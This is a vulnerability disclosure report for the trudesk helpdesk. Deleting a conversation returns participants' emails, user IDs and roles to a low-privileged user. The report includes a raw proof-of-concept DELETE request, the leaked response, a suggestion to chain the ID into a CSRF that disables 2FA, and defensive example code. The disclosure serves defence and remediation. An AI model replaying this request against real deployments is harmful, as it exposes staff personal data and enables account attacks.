Exposure of Sensitive Information to an Unauthorized Actor in polonel/trudesk

Status: Valid

Reported on Dec 31st 2021


Description

When a conversation is deleted, the server responds with the full conversation object, which includes the user ID, username, email address, role and last-online timestamp of every participant. The endpoint contacted to delete a conversation is DELETE /api/v1/messages/conversation/<conversation ID>.

A low-privileged user (such as a customer account) can start a conversation with an admin or support agent, delete it, and read that admin's or agent's email address and user ID straight out of the delete response.

Proof of Concept

Request to delete a conversation:

DELETE /api/v1/messages/conversation/61cbd4e1ce4a7b08a27da13d HTTP/1.1
Host: docker.trudesk.io
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Origin: https://docker.trudesk.io
DNT: 1
Connection: keep-alive
Referer: https://docker.trudesk.io/messages/61cbd4e1ce4a7b08a27da13d
Cookie: connect.sid=s%3A31gkqni9Vf8BD36ANQ7gKXaqrXC7kB5o.%2Fxp0Y6uSTTPs0mRElGQX7DgfBvjTgY8TLaQKI5VbsoM; $trudesk%3Atimezone=America/New_York; io=XohJgk5RuPIxqanVAAzL
Sec-GPC: 1

After a conversation is deleted, the server responds with this data:

{
  "success": true,
  "conversation": {
    "participants": [
      {
        "_id": "61c8238fce4a7b08a27da00d",
        "username": "customer.demo",
        "email": "turnonit@gmail.com",
        "fullname": "Client",
        "title": "Client",
        "role": {
          "_id": "5c860277e518a8003458fae7",
          "name": "User",
          "description": "Default role for users",
          "normalized": "user",
          "isAdmin": false,
          "isAgent": false,
          "id": "5c860277e518a8003458fae7"
        },
        "lastOnline": "2021-12-26T08:12:37.037Z"
      },
      {
        "_id": "5ba4104e5b2b5a00605e95a2",
        "username": "demo.user",
        "fullname": "Demo User",
        "email": "demo.admin@trudesk.io",
        "role": {
          "_id": "5c860277e518a8003458fae9",
          "name": "Admin",
          "description": "Default role for admins",
          "normalized": "admin",
          "isAdmin": true,
          "isAgent": true,
          "id": "5c860277e518a8003458fae9"
        },
        "title": "Demo Admin",
        "lastOnline": "2021-12-26T08:02:59.342Z"
      }
    ],
    "_id": "61c823ebce4a7b08a27da00e",
    "userMeta": [
      {
        "userId": "61c8238fce4a7b08a27da00d",
        "joinedAt": "2021-12-26T08:12:27.015Z",
        "createdAt": "2021-12-26T08:12:27.022Z",
        "updatedAt": "2021-12-26T08:12:55.266Z",
        "deletedAt": "2021-12-26T08:12:55.264Z"
      },
      {
        "userId": "5ba4104e5b2b5a00605e95a2",
        "joinedAt": "2021-12-26T08:12:27.015Z",
        "lastRead": "2021-12-26T08:12:27.015Z",
        "createdAt": "2021-12-26T08:12:27.022Z",
        "updatedAt": "2021-12-26T08:12:27.022Z"
      }
    ],
    "updatedAt": "2021-12-26T08:12:44.650Z",
    "createdAt": "2021-12-26T08:12:27.018Z",
    "__v": 0
  }
}

Impact

Because the response leaks identifying data, an attacker can chain it into other attacks. For example, the leaked user ID is exactly the value needed to craft a CSRF request that disables the victim's 2FA (a CSRF vulnerability I reported separately: https://huntr.dev/bounties/edit/af3ecce4-840f-445e-98d0-11557cd8de1f/).

Occurrences

After a conversation is successfully deleted, the handler returns the sConvo variable, i.e. the full conversation document, including the participants array (user IDs, usernames, email addresses, roles, last-online timestamps) and the userMeta array (user IDs). This data should be stripped before the response is sent: the client only needs the success flag and, at most, the conversation ID.
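As an added example (not trudesk's own code), the two response shapes side by side, plus a check that walks a JSON body and lists every path carrying participant data. The field names (participants, userMeta, _id, email, ...) follow the response shown above; the function names, the sample conversation with placeholder IDs and addresses, and the Express-free handler shape are assumptions made for illustration.

```javascript
// Added example, not trudesk code: "vulnerable" vs "hardened" body for
// DELETE /api/v1/messages/conversation/:id, plus a PII check on the body.

// Constructed sample (placeholder ids and addresses) with the same structure
// as the real response in the report.
const sampleConversation = {
  participants: [
    {
      _id: '000000000000000000000001',
      username: 'customer.demo',
      email: 'customer@example.org',
      fullname: 'Client',
      title: 'Client',
      role: { _id: '000000000000000000000010', name: 'User', normalized: 'user', isAdmin: false, isAgent: false },
      lastOnline: '2021-12-26T08:12:37.037Z',
    },
    {
      _id: '000000000000000000000002',
      username: 'demo.user',
      email: 'admin@example.org',
      fullname: 'Demo User',
      title: 'Demo Admin',
      role: { _id: '000000000000000000000011', name: 'Admin', normalized: 'admin', isAdmin: true, isAgent: true },
      lastOnline: '2021-12-26T08:02:59.342Z',
    },
  ],
  _id: '000000000000000000000100',
  userMeta: [
    { userId: '000000000000000000000001', joinedAt: '2021-12-26T08:12:27.015Z', deletedAt: '2021-12-26T08:12:55.264Z' },
    { userId: '000000000000000000000002', joinedAt: '2021-12-26T08:12:27.015Z', lastRead: '2021-12-26T08:12:27.015Z' },
  ],
  createdAt: '2021-12-26T08:12:27.018Z',
  updatedAt: '2021-12-26T08:12:44.650Z',
};

// Vulnerable pattern: after the delete succeeds, the whole conversation
// document is echoed back to whoever sent the DELETE.
function vulnerableDeleteResponse(conversation) {
  return { success: true, conversation };
}

// Hardened pattern: the client only needs to know the delete worked and
// which conversation it applied to, so nothing about other users is sent.
function hardenedDeleteResponse(conversation) {
  return { success: true, conversation: { _id: String(conversation._id) } };
}

// Response check: returns every path in a body that carries participant data.
// Keys that are always PII are listed explicitly; a participant's own `_id`
// is a user ID and is flagged by position; any string that looks like an
// email address is flagged regardless of its key.
const SENSITIVE_KEYS = new Set(['email', 'username', 'fullname', 'lastOnline', 'userId']);
const EMAIL_RE = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
const PARTICIPANT_PATH_RE = /participants\[\d+\]$/;

function findSensitiveFields(value, path = '', found = []) {
  if (Array.isArray(value)) {
    value.forEach((item, i) => findSensitiveFields(item, `${path}[${i}]`, found));
  } else if (value !== null && typeof value === 'object') {
    for (const [key, child] of Object.entries(value)) {
      const childPath = path ? `${path}.${key}` : key;
      const isUserId = key === '_id' && PARTICIPANT_PATH_RE.test(path);
      const looksLikeEmail = typeof child === 'string' && EMAIL_RE.test(child);
      if (SENSITIVE_KEYS.has(key) || isUserId || looksLikeEmail) {
        found.push(childPath);
      } else {
        findSensitiveFields(child, childPath, found);
      }
    }
  }
  return found;
}

// Usage: compare what each response shape exposes for the sample conversation.
console.log(findSensitiveFields(vulnerableDeleteResponse(sampleConversation)));
console.log(findSensitiveFields(hardenedDeleteResponse(sampleConversation)));
```

The check is deliberately key-based rather than schema-based so it can be pointed at any JSON body the API returns; running it against the vulnerable shape lists twelve paths (both participants' IDs, usernames, emails, full names and last-online times, plus both userMeta user IDs), while the hardened shape yields none.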

We are processing your report and will contact the polonel/trudesk team within 24 hours. 6 months ago
We have contacted a member of the polonel/trudesk team and are waiting to hear back 6 months ago
We have sent a follow up to the polonel/trudesk team. We will try again in 7 days. 6 months ago
We have sent a second follow up to the polonel/trudesk team. We will try again in 10 days. 5 months ago
Chris Brame validated this vulnerability 5 months ago
1d8 has been awarded the disclosure bounty
The fix bounty is now up for grabs
Chris Brame
a month ago

Maintainer


This has been fixed in v1.2.2. I will update this report once it is released.

Chris Brame confirmed that a fix has been merged on e2db47 a month ago
Chris Brame has been awarded the fix bounty
messages.js#L311 has been validated